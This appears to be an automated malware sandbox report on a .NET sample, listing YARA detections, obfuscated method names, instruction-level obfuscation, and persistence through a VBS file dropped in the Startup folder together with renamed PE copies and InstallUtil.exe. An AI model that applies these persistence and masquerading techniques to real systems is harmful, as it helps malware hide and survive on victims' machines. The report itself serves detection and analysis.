Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.8820000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6a58920.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6966d00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.68750d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.60525e8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2288766679.0000000008820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2262903919.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2444515974.0000000006783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_028BA306 push ecx; retf	7_2_028BA312
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088CBEEA push eax; retf	7_2_088CBF09
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B62EC push cs; iretd	7_2_089B62EF
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C380FC push E8080A53h; ret	7_2_08C38101
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C3615B push E8080A6Ah; iretd	7_2_08C36160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00C4EF9E pushad ; ret	8_2_00C4EFA5
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_04B1A30C push ecx; retf	19_2_04B1A312
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A4C09 pushad ; retf	19_2_093A4C0F
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A62EC push cs; iretd	19_2_093A62EF

Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, WpavyhD7EdUgfohP8Q0.cs	High entropy of concatenated method names: 'x0lDIWOJpP', 'PYJDheQoZC', 'qX9DPCkq92', 'rpoDndqSOs', 'mi8D2tqBZW', 'uCWDXQiVFI', 'WoyD32l1sa', 'oDSDyiJoUq', 'bQUDtuo6Cl', 'eCaDpKrHeM'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'LNJUmKKgiEWpS3nf41K'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, O8kqMFCgVIxy7aV2MlK.cs	High entropy of concatenated method names: 'UGgCoSw2Xg', 'MiECLK9Gnk', 'EvMCseW9Tw', 'P30CuTvX6n', 'HjcCeqxioJ', 'wZdCGsSouu', 'WSvCA9ZNYT', 'VKpCjMm3kW', 'nGBCxne5ZF', 'M7OCmUInOE'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FP9HXVDzuMtAk48UHIk.cs	High entropy of concatenated method names: 'QbpGdQMsbW', 'HaNGqHJRRm', 'quHGWEPGf3', 'q9PGcg9bQD', 'HtAGUTTqog', 'th2G80WvN7', 'KEqGT8jHHm', 'jm7LQSXx7F', 'lFmG03jtau', 'PHRGfhJIiH'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, xbmPegaf9KeWIvGwLCh.cs	High entropy of concatenated method names: 'EEAawvM3QK', 'UaEai4Affs', 'PA9aFWbc3U', 'eo2a7E2BDF', 'kqLalSOiJM', 'GSBlJW7uNO7wrtZOCKO', 'nSOhQ27eUbE7PgYfLIT', 'PhqnoX7GHVPpkLH2pA9', 'Fp68nC7Ac5o1lae9SAD', 'tPb9kt7jH22saShNlQX'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	High entropy of concatenated method names: 'TKv1NeKS1Bq7hJBUAxg', 'yPdp3HKVgdh6L9BdWMs', 'dRQDDtJpFn', 'XhqX9WK1AMV76NFMVQa', 'Ruvnx2KbM33fSjqyToG', 'n3n0ErKYmo2TVfv3Tvg', 'Symsy8KIevtTd1C9H04', 'ejJrOCKhN8HmCidYKyl', 'pqlM1lKPSyijR4iNnMi', 'WTLbZBKnXl8GpFQPXoF'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, oBaXCmDfWWcAesiu78d.cs	High entropy of concatenated method names: 'TwjRpFSZyR', 'fqRRzGLZIr', 'YJQecBSHy6aftJHspfN', 'rcDrRNSo6nGXWSc5Sx1', 'QAxJMTSDcZgGDEKEIhl', 'kjjip2SLmVhKUX6b8r7', 'Nc4UYMSOobNvoFvXIYr', 'xDDCd2SsoCdub0SgZCD'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, JY5VB4HeaHM7YahREUb.cs	High entropy of concatenated method names: 'JxGHA16xkG', 'uGaHjt4DFn', 'Lft5oRklBRJsWW8IsbI', 'mClYeskkk999JqicWO2', 'dWNTVdkKZaqRyEAYZ5V', 'KwSrw3kSvj86fYCUOLG', 'scDMJ0kVimaBaXVQus6', 'o9hTNwkBWY5hQDDj3tT', 'R3IkShk5INwtodlKrpW'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, WpavyhD7EdUgfohP8Q0.cs	High entropy of concatenated method names: 'x0lDIWOJpP', 'PYJDheQoZC', 'qX9DPCkq92', 'rpoDndqSOs', 'mi8D2tqBZW', 'uCWDXQiVFI', 'WoyD32l1sa', 'oDSDyiJoUq', 'bQUDtuo6Cl', 'eCaDpKrHeM'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'LNJUmKKgiEWpS3nf41K'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, O8kqMFCgVIxy7aV2MlK.cs	High entropy of concatenated method names: 'UGgCoSw2Xg', 'MiECLK9Gnk', 'EvMCseW9Tw', 'P30CuTvX6n', 'HjcCeqxioJ', 'wZdCGsSouu', 'WSvCA9ZNYT', 'VKpCjMm3kW', 'nGBCxne5ZF', 'M7OCmUInOE'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FP9HXVDzuMtAk48UHIk.cs	High entropy of concatenated method names: 'QbpGdQMsbW', 'HaNGqHJRRm', 'quHGWEPGf3', 'q9PGcg9bQD', 'HtAGUTTqog', 'th2G80WvN7', 'KEqGT8jHHm', 'jm7LQSXx7F', 'lFmG03jtau', 'PHRGfhJIiH'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, xbmPegaf9KeWIvGwLCh.cs	High entropy of concatenated method names: 'EEAawvM3QK', 'UaEai4Affs', 'PA9aFWbc3U', 'eo2a7E2BDF', 'kqLalSOiJM', 'GSBlJW7uNO7wrtZOCKO', 'nSOhQ27eUbE7PgYfLIT', 'PhqnoX7GHVPpkLH2pA9', 'Fp68nC7Ac5o1lae9SAD', 'tPb9kt7jH22saShNlQX'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	High entropy of concatenated method names: 'TKv1NeKS1Bq7hJBUAxg', 'yPdp3HKVgdh6L9BdWMs', 'dRQDDtJpFn', 'XhqX9WK1AMV76NFMVQa', 'Ruvnx2KbM33fSjqyToG', 'n3n0ErKYmo2TVfv3Tvg', 'Symsy8KIevtTd1C9H04', 'ejJrOCKhN8HmCidYKyl', 'pqlM1lKPSyijR4iNnMi', 'WTLbZBKnXl8GpFQPXoF'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, oBaXCmDfWWcAesiu78d.cs	High entropy of concatenated method names: 'TwjRpFSZyR', 'fqRRzGLZIr', 'YJQecBSHy6aftJHspfN', 'rcDrRNSo6nGXWSc5Sx1', 'QAxJMTSDcZgGDEKEIhl', 'kjjip2SLmVhKUX6b8r7', 'Nc4UYMSOobNvoFvXIYr', 'xDDCd2SsoCdub0SgZCD'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, JY5VB4HeaHM7YahREUb.cs	High entropy of concatenated method names: 'JxGHA16xkG', 'uGaHjt4DFn', 'Lft5oRklBRJsWW8IsbI', 'mClYeskkk999JqicWO2', 'dWNTVdkKZaqRyEAYZ5V', 'KwSrw3kSvj86fYCUOLG', 'scDMJ0kVimaBaXVQus6', 'o9hTNwkBWY5hQDDj3tT', 'R3IkShk5INwtodlKrpW'

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\xcopy.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior

Drops PE files

Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe			Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe			Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe			Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
